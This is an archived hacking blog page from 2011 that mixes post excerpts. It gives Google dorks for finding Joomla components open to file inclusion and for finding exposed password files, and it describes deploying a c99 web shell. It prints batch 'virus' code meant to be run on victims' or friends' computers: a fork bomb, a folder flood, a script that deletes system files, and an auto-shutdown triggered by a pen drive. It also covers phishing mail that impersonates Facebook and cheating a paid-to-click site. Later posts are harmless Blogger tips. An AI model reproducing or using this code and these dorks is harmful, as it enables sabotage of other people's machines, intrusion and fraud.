Sunday, August 28, 2011

LFI & RFI Goggle Dork

Now I will post about LFI & RFI, but this only dork just goggle for
 tutorials will follow. Since posting my tutorials will be step by step
 so you could control and make the webmaster thought not to
 underestimate you again, and it is definitely me too. Once again this
 is only for pendindikan course, if you abuse it the same rights and
 your risks.

!lfi submitComment.php?DOCUMENT_ROOT= submitComment.php
 !lfi index.php?option=com_beeheard&controller=
 index.php?option=com_beeheard
 !lfi index.php?option=com_arcadegames&controller= option=com_arcadegames
 !lfi index.php?option=com_flashgames&controller= "option=com_flashgames"
 !lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
 !lfi index.php?option=com_advertising&controller=
 index.php?option=com_advertising
 !lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
 !lfi index.php?option=com_myfiles&controller=
 index.php?option=com_myfiles
 !lfi index.php?option=com_onlineexam&controller= "option=com_onlineexam"
 !lfi /index.php?option=com_joommail&controller= /index.php?option=com_joommail
 !lfi /index.php?option=com_memory&controller= "option=com_memory"
 !lfi index.php?option=com_market&controller= "?option=com_market"
 !lfi index.php?option=com_diary&controller= index.php?option=com_diary
 !lfi /index.php?option=com_worldrates&controller= option=com_worldrates
 !lfi index.php?option=com_record&controller= index.php?option=com_record
 !lfi index.php?option=com_sweetykeeper&controller=
 index.php?option=com_sweetykeeper
 !lfi index.php?option=com_wgpicasa&controller=
 index.php?option=com_wgpicasa
 !lfi /index.php?option=com_s5clanroster&view= /index.php?option=com_s5clanroster
 !lfi index.php?option=com_photobattle&view=
 index.php?option=com_photobattle
 !lfi index.php?option=com_mtfireeagle&controller=
 index.php?option=com_mtfireeagle
 !lfi index.php?option=com_lovefactory&controller=
 index.php?option=com_lovefactory
 !lfi index.php?option=com_jacomment&view= option=com_jacomment
 !lfi index.php?option=com_delicious&controller=
 index.php?option=com_delicious&controller=
 !lfi index.php?option=com_blogfactory&controller=
 index.php?option=com_blogfactory
 !lfi index.php?option=com_sebercart&view= index.php?option=com_sebercart
 !lfi index.php?option=com_jwhmcs&controller= index.php?option=com_jwhmcs
 !lfi index.php?option=com_jukebox&controller=
 index.php?option=com_jukebox
 !lfi index.php?option=com_joomlaflickr&controller=
 index.php?option=com_joomlaflickr
 !lfi index.php?option=com_hsconfig&controller=

Top 10 Security Threats of 2010

OWASP has released the list of top 10 web security threats of 2010 . The Open Web Application Security Project (OWASP) is an open community dedicated to the enhancement of all kinds of web and computer security . These are the threats which has caused the maximum damage to cyber world in 2010 . Here are these security risks .


1 SQL Injection
 Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

2. Cross Site Scripting (XSS)

 XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Remote File Inclusion (RFI) | Website Hacking

Before starting this tutorial, I would like to tell you about a piece of code called as  shell. There are many shells available . Lets consider a shell known as c99 shell. First download it from here.

 Now signup for a account on any free web hosting site . Say 110mb.com.  Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of  shell you uploaded.

http://username.110mb.com/shell.php

and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.

Saturday, August 27, 2011

STEALING PASSWORD WITH GOOGLE HACK


Google is a treasure trove full of important information, especially for the underground world. This Potential fact can also be utilized in the data for the username and password stored on a server.

If the administrator save important data not in the complete system authentifikasi folder, then most likely be reached by the google search engine. If data is successfully steal in by the unauthorized person, then the will be in misuse.

Here, some google search syntax to crawl the password:

1. "Login: *" "password =*" filetype: xls (searching data command to the system files that are stored in Microsoft Excel)

2. allinurl: auth_user_file.txt (to find files auth_user_file.txt containing password on server)

Friday, August 26, 2011

Format HDD using Batch program and Binary codes in Notepad

If you like to format some others HDD , This tutorial will help you.   Here i am going to give you the Batch program and binary code that will format the hard disk. 

 It will be very funny if you implement it in your college or school or in your friend computer (for fun,but it will destroy the os ).

       Don't Try it on your PC.  Then you can't boot to your OS.  Then you need to install the OS.

Follow the Steps:

How to disable your victim's Mouse whenever he insert pen drive

Hi friends ,  Hacking is one of the fun .  You can attract your friends by simply doing some hacks before them.  You can also make your victims or enemies in confusion.  This article will help you to make the small fun with hack. 

 Let's come to the point.  Today i am going to guide you how to disable your victim's or friend's (whoever) mouse,whenever he inserts  pen drive.  You can call it as virus which will disable the mouse.


How we are going to do?

     We are going to create this virus using our usual Batch programming.  In this post i am not only giving you simply the code but also explanation for the Batch program.   So I hope that this post will make you happy.

How to shutdown your victim's system using pen drive

In my last post i explained you about how to create a virus which will disable the mouse whenever pen drive inserted.  In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted.

Step 1:

copy this code into notepad:
@echo off
 shutdown -s -t 00

A small Introduction about Batch Programming for Hackers

 What is Batch file?
Batch files are a list of command line instructions that are "batched" together in one file. Most of the command lines can be executed within the command prompt, but batch files make the work load much easier. Batch files can be opened, copied, and edited using notepad.

 They are used for simple routines and low-level machine instruction. On Windows, many batch files can be seen within the c:\Windows directory.

 Batch files, more or less, make up the backbone of the Windows Operating System. The operating system must have access to these files and be able to add and delete instructions from them. Delete them, and you have effectively disabled the OS.

How to create a Dangerous virus using Batch programming?

In this post i am going to give you dangerous virus code which is written in Batch Programming language.

 Virus can do:
  • Copy itself into startup
  • Copy itself over one thousand times into random spots in your computer
  • Hide its self and all other created files
  • Task kill MSN, Norton, Windows Explorer, Limewire.
  • Swap the left mouse button with the right one
  • Opens alert boxes
  • Changes the time to 12:00 and shuts down the computer

Verry very Dangerous Virus Program using Batch Programming

Hi friends, here is another very very dangerous virus progrmming using Batch programming. This is very very danger than the previous virus code. So be careful than the before one.

Viruc will do:
  • Copy itself for multiple times.
  • This will disable the restore option by deleting the restore file.
  • This will disable the login option.
  • If this affect the system, then the user can't use his OS longer.
start

How to lock a folder without any software (Batch Programming)

Hi in my last post i guide you to create a batch programming to create a locker. This is very cool. You don't need to download any locker softwares. You are going to enjoy this hack.

 In my older post i explain you how to lock folder using command prompt. But in that no password option. But this is going to very cool using password.

Locker Code:

cls
 @ECHO OFF
 title Folder Locker

Fake virus for making fun with your friends

Hi friends, you probably don't want to harm your friend pc but you like to fun with them.  If you think so, then you can use this fake virus.

Fake virus what i mean?
    This is not at all virus.  This is not at all make any effect.  It just shut down your friend system for only once and show  " your facebook account is hacked"(for fun only).


What is the code?
    So far we create a lot of virus using Batch programming .  This time also we are going to use our Batch programming. 

Create a virus to make the computer freezed using Batch Programming

Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school.

This is for newbie. This virus is harmful for CPU. So be careful. Don't run this in your pc or friend pc.
Open a notepad.

copy this code to notepad:

%0|%0

Save the file with .bat extension (For eg: music.bat)

Create a virus to create a infinite folder in a drive

Hi Hackers, this batch code will very helpful for you.  This is simple and effective virus code.

 As usual open notepad.
 Copy this code to Notepad.

@echo off
 :top
 md %random%
 goto top

 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
 md %random% is command that creating folders with random names.
 goto top – return to label :top , infinite loop


 Save the file with .bat extension(for eg: folderscreate.bat)

 That's all if you double click the file it will create a finite folder wherever the batch file is.

Virus to Delete mouse,explore,logoff using Batch Programming

Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.

@echo off

 @if exist c:\windows\system32\mouse del c:\windows\system32\mouse
 @if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
 copy C:\windows\
 @if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
 @if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

 I hope that you know how to create batch programming. If you don't know please read previous posts about Batch Programming.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >
 #include < fstream.h >
 #include < iostream.h >
 #include < string.h >
 #include < conio.h >
 int main()

How to send Anonymous Mail to anyone|Set up your own server

Everyone Like to send Anonymous Mail to your enemy or friend or teacher.  Here is the Hacking tutorial for you to implement that.  So i hope This will be best hack for you.

What is the Use?
 I explained you in my older post how to get ip address.  To get the ip address you need to send the mail with link.  So You can send mail to your victim with that link such that you are contacting from an organization.

For Eg:

You can say we are from Facbook,we have new feature to enable the feature visit this page.

How to do?

Thursday, August 25, 2011

Domain name hijacking


In this post, I will show you how domain names are hacked. Hacking of a domain name from it's original user is known as Domain name hijacking. Let me explain what is this.

Suppose i bought a domain name. Now i need a web host for hosting my website. 
Now how it works??


When we bought a domain name, we also get a control panel for full control on this domain name. From this control panel we point our domain to the web server where our files are actually host.
For ex- I have a domain name abc.com and i bought hosting at a server webhost.com. then for working of our website we need to setup our domain to point to our web hosting server webhost.com.

What is a Proxy Server?

What is a Proxy Server?


It is a server that sits between a client application, such as a Web browser, and a real server for which client requested. Proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. It intercepts all requests from client to the real server to see if it can fulfill the requests itself. If not, it forwards the request to the real server.In some cases, the proxy may alter the client's request or the server's response for various purposes.
Proxy servers have two main purposes:


Improve Performance: Proxy servers can improve performance for users. This is because it saves the results of all requests for a certain amount of time. Next time if same request comes, it serves from the saved pages rather than the real server.

Remove Viruses From USB Drive Easily & Effectively:

Remove Viruses From USB Drive Easily & Effectively:


REMOVE VIRUS FROM PENDRIVE VERY EFFECTIVELY:-

There are some common virus that can spread and infect your computer through USB drives. These viruses include ‘Ravmon‘, ‘New Folder.exe‘, ‘Orkut is banned and some other common viruses. Most antivirus either do not detect these viruses or do not remove them (just quarantine them).

Here are the things to do if you want to remove these virus from your USB and want to have a virus free flash disk.

Sunday, August 21, 2011

How to list recent post titles by label


Do you want to list all or your most recent posts according to categories/labels? Well then, you’ve come to the right tutorial.
I’ve seen people use LinkList gadgets to accomplish this. However this method requires them to MANUALLY add the link (of the post) to the gadget every time they publish a post with the specified label. Not good.

Automatically add hashtags to your tweets

Hashtags are topics or categories for your tweets. They are in a way similar to (Blogger post) labels, but for Twitter. Hashtags are made up of keywords, preceded by a hash (#) symbol.
Adding a hashtag gives your tweet a potential to be picked up by people searching for that particular hashtag. Look at the example below as I hashtagged #blogspot and #tutorials to my tweet. If you were to search for either #blogspot or #tutorials using Twitter search box, then you just might see this particular tweet, together with other tweets with the same hashtags.



twitter hashtag

Adding label (category) tabs to navigation bar

How do you add a tab (on horizontal navigation bar) that shows all the posts that fall under a subject or category in Blogger?

tab display all posts that fall under a particular label category


Before I give a correct answer, let’s first see a popular-but-wrong DIY method (using Music category as an example):
  1. Create a page with “Music” as the title. “Music” tab will be added to the bar automatically. So far so good.
  2. Attempt to add music posts to the page. This is where it gets stuck, because posts can’t be added to pages.
  3. Mission failed.  

How to login to multiple accounts at the same time

Do you have more than one accounts of the same website? Google, Facebook, Yahoo or Twitter perhaps? If you do then you must’ve realized that you can’t log in to your second account without logging off from the first one. In other words you can only access one account at any one time. Frustrating isn’t it?
But hey if you are a Mozilla Firefox browser user there is good news: An add-on called Multifox allows Firefox to access websites using different accounts, simultaneously! Each account will be opened in a new Firefox window, and they won’t interfere with each other.
Multifox works by adding a Profile command (Open Link in New Identity Profile) to context menus of links and bookmarks. It also adds a command to File menu (New Identity Profile).

How To Hack bux.to and make money

Bux.to is a PTC site(Paid to click).You get paid to click on ads and visit websites. The process is easy! You simply click a link and view a website for 30 seconds to earn money.In this article i will show you on How to hack bux.to to browse ads.By using this trick you will be able to surf more ads and the most amazing part is that you will not get banned by doing this.


Here is a step by step procedure to
hack bux.to and make money:
Step 1:

First of all signup for bux.to account




Sunday, August 7, 2011

How to Hack Websites & Servers from Scratch! Step by Step Tutorial for Beginners

I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration test in a black box (attacker) point of view. It is designed to give you the idea on how an attacker can break into your system, what am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered these info from various sources and tutorials, i have changed many stuff, clarified many parts, gave some references, and put many information together. I'm still a learner & on the way to my goal. However, this won't prevent from teaching others what i have learned so far & don't worry i'm not going to provide you any info that i'm not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I write this tutorial for educational purposes only.
Since i'm not a native speaker, expect to see lots of grammar and spelling mistakes.

Before you hack a system, you must decide what is your goal. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discover vulns & see how you can exploit them, etc ... The point is you have to decide the goal.

The most common goals are: